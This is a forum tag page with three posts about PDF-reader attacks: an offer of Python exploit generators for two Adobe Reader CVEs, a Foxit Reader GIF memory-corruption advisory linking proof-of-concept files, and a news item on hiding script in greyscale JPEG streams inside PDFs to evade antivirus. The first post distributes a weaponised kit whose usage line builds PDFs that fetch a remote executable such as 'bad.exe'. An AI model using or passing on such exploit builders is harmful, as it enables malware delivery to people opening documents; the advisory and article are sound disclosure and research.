Showing results for tags 'reader'.
-
Here are Adobe Reader exploits for CVE-2011-2462 and 2 different versions of CVE-2010-2883. All the code is Python.

Usage for cve2011-4262: createExploitPDF.py http://example.com/bin/bad.exe
Usage for CVE-2010-2883: [input_file.exe] [output_file.pdf]

adobe.rar — RGhost — file sharing
List of files

File name                   Size     Compressed  Ratio
adobe/createExploitPDF.py   32.2 KB  5.93 KB     18.425%
adobe/PDF2883v2.py          414 KB   128 KB      30.835%
adobe/PDF2883v3.py          665 KB   202 KB      30.306%
adobe

Source: opensc
-
#####################################################################################

Application: Foxit Products GIF Conversion Memory Corruption Vulnerabilities (DataSubBlock)
Platforms: Windows
Versions: The vulnerability is confirmed in version Foxit Reader 7.x. Other versions may also be affected.
Secunia: SA63346
{PRL}: 2015-02
Author: Francis Provencher (Protek Research Lab’s)
Website: http://www.protekresearchlab.com/
Twitter: @protekResearch

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) POC

#####################################################################################

===============
1) Introduction
===============

Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files.[3] Early versions of Foxit Reader were notable for startup performance and small file size.[citation needed] Foxit has been compared favorably to Adobe Reader.[4][5][6] The Windows version allows annotating and saving unfinished PDF forms, FDF import/export, converting to text, highlighting and drawing.

(http://en.wikipedia.org/wiki/Foxit_Reader)

#####################################################################################

============================
2) Report Timeline
============================

2015-01-22: Francis Provencher from Protek Research Lab’s found the issue;
2015-01-28: Foxit Security Response Team confirmed the issue;
2015-01-28: Foxit fixed the issue;
2015-03-09: Foxit released fixed version of Foxit Reader 7.1/Foxit Enterprise Reader 7.1/Foxit PhantomPDF7.1.

#####################################################################################

============================
3) Technical details
============================

An error when handling the Size member of a GIF DataSubBlock data structure can be exploited to cause memory corruption via a specially crafted GIF file.

#####################################################################################

===========
4) POC
===========

http://protekresearchlab.com/exploits/PRL-2015-02.gif
http://www.exploit-db.com/sploits/36335.gif

###############################################################################

Source
-
Greyscale pics are a great place to hide malcode

Hackers can duck antivirus programs and execute malware in Adobe Reader by using greyscale images, says Danish security boffin Dénes Óvári.

Lossy compression is thought to be susceptible to the DCTDecode filter, which should nuke malware woven into images and blunt this form of attack.

However new intelligence published in the paper Script in a Lossy Stream (PDF) shows bad guys and penetration testers can use the filter within PDF documents to hide malcode using JPEG images that are set to greyscale to avoid distortion.

This process gives antivirus and human malware analysts the slip as they generally assume any malcode hiding in the JPEG filter will be compressed and scrambled.

“Following the introduction of a sandbox for JavaScript code in Acrobat Reader, the use of PDF as an attack vector decreased dramatically,” Óvári says.

“Although this is not a security breach in itself, the fact that the usage of DCTDecode for this purpose has seemingly been ruled out by the industry means that even known threats could be hidden in this way from anti-virus scanners or researchers.

“In order to provide users with maximum protection, the DCTDecode stream must no longer be overlooked: in PDF reader implementations, the referencing of uncompressed image data as parameters from objects expecting binary data should be prohibited.”

Óvári says attacks still require exploits to be used inside the DCTDecode stream, reducing the overall threat presented by the research.

He created a proof of concept attack in which he says a script was encoded as a high-quality greyscale JPEG image, placed in an image object filtered with DCTDecode, and then referenced by a JavaScript action entry.

“When opening the document, the alert dialog just pops up under the old Reader 9, proving that the code of the short script was decompressed losslessly,” he says.

The attack still works under the latest version of Reader with some small modification.

Óvári says other file formats that assume data within JPEGs uses lossy compression while a greyscale mode is available should be re-evaluated.

Source